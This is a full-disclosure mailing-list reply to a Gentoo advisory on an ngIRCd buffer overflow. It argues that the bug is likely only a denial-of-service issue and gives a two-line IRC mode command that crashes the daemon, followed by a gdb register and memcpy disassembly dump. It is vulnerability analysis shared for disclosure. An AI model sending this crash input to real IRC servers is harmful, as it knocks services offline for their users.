<<< Date Index >>>     <<< Thread Index >>>

Re: [Full-Disclosure] [ GLSA 200501-40 ] ngIRCd: Buffer overflow




>   Severity: High
>      Title: ngIRCd: Buffer overflow
>       Date: January 28, 2005
>       Bugs: #79705
>         ID: 200501-40
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> Synopsis
> ========
>
> ngIRCd is vulnerable to a buffer overflow that can be used to crash the
> daemon and possibly execute arbitrary code.

after a quick check IMHO the bug is not exploitable (except for dos):

to reproduce the bug do:

/j #test
/mode #test +I aaax300here@aaax128here


and watch it go down in:

Program received signal SIGSEGV, Segmentation fault.
0x400c5b8c in memcpy () from /lib/libc.so.6
(gdb) info all-registers
eax            0x8067e2c        134643244
ecx            0xffffad7f       -21121
edx            0x80650ca        134631626
ebx            0xffffff53       -173
esp            0xbfffeb24       0xbfffeb24
ebp            0xbfffeb58       0xbfffeb58
esi            0x806a29e        134652574
edi            0x806d000        134664192
eip            0x400c5b8c       0x400c5b8c

Dump of assembler code for function memcpy:
0x400c5b20 <memcpy>:    push   %edi
0x400c5b21 <memcpy+1>:  push   %esi
0x400c5b22 <memcpy+2>:  mov    0xc(%esp,1),%edi
0x400c5b26 <memcpy+6>:  mov    0x10(%esp,1),%esi
0x400c5b2a <memcpy+10>: mov    0x14(%esp,1),%ecx
0x400c5b2e <memcpy+14>: mov    %edi,%eax
0x400c5b30 <memcpy+16>: cld
0x400c5b31 <memcpy+17>: cmp    $0x20,%ecx
0x400c5b34 <memcpy+20>: jbe    0x400c5b8c <memcpy+108>
0x400c5b36 <memcpy+22>: neg    %eax
0x400c5b38 <memcpy+24>: and    $0x3,%eax
0x400c5b3b <memcpy+27>: sub    %eax,%ecx
0x400c5b3d <memcpy+29>: xchg   %eax,%ecx
0x400c5b3e <memcpy+30>: repz movsb %ds:(%esi),%es:(%edi)
0x400c5b40 <memcpy+32>: mov    %eax,%ecx
0x400c5b42 <memcpy+34>: sub    $0x20,%ecx
0x400c5b45 <memcpy+37>: js     0x400c5b85 <memcpy+101>
0x400c5b47 <memcpy+39>: mov    (%edi),%eax
0x400c5b49 <memcpy+41>: mov    0x1c(%edi),%edx
0x400c5b4c <memcpy+44>: sub    $0x20,%ecx
0x400c5b4f <memcpy+47>: mov    (%esi),%eax
0x400c5b51 <memcpy+49>: mov    0x4(%esi),%edx
0x400c5b54 <memcpy+52>: mov    %eax,(%edi)
0x400c5b56 <memcpy+54>: mov    %edx,0x4(%edi)
0x400c5b59 <memcpy+57>: mov    0x8(%esi),%eax
0x400c5b5c <memcpy+60>: mov    0xc(%esi),%edx
0x400c5b5f <memcpy+63>: mov    %eax,0x8(%edi)
0x400c5b62 <memcpy+66>: mov    %edx,0xc(%edi)
0x400c5b65 <memcpy+69>: mov    0x10(%esi),%eax
0x400c5b68 <memcpy+72>: mov    0x14(%esi),%edx
0x400c5b6b <memcpy+75>: mov    %eax,0x10(%edi)
0x400c5b6e <memcpy+78>: mov    %edx,0x14(%edi)
0x400c5b71 <memcpy+81>: mov    0x18(%esi),%eax
0x400c5b74 <memcpy+84>: mov    0x1c(%esi),%edx
0x400c5b77 <memcpy+87>: mov    %eax,0x18(%edi)
0x400c5b7a <memcpy+90>: mov    %edx,0x1c(%edi)
0x400c5b7d <memcpy+93>: lea    0x20(%esi),%esi
0x400c5b80 <memcpy+96>: lea    0x20(%edi),%edi
0x400c5b83 <memcpy+99>: jns    0x400c5b49 <memcpy+41>
0x400c5b85 <memcpy+101>:        add    $0x20,%ecx
0x400c5b88 <memcpy+104>:        mov    0xc(%esp,1),%eax
0x400c5b8c <memcpy+108>:        repz movsb %ds:(%esi),%es:(%edi)
0x400c5b8e <memcpy+110>:        pop    %esi
0x400c5b8f <memcpy+111>:        pop    %edi
0x400c5b90 <memcpy+112>:        ret
0x400c5b91 <memcpy+113>:        nop
0x400c5b92 <memcpy+114>:        nop
0x400c5b93 <memcpy+115>:        nop
0x400c5b94 <memcpy+116>:        nop
0x400c5b95 <memcpy+117>:        nop
0x400c5b96 <memcpy+118>:        nop
0x400c5b97 <memcpy+119>:        nop
0x400c5b98 <memcpy+120>:        nop
0x400c5b99 <memcpy+121>:        nop
0x400c5b9a <memcpy+122>:        nop
0x400c5b9b <memcpy+123>:        nop
0x400c5b9c <memcpy+124>:        nop
0x400c5b9d <memcpy+125>:        nop
0x400c5b9e <memcpy+126>:        nop
0x400c5b9f <memcpy+127>:        nop
End of assembler dump.
(gdb)

yours
-q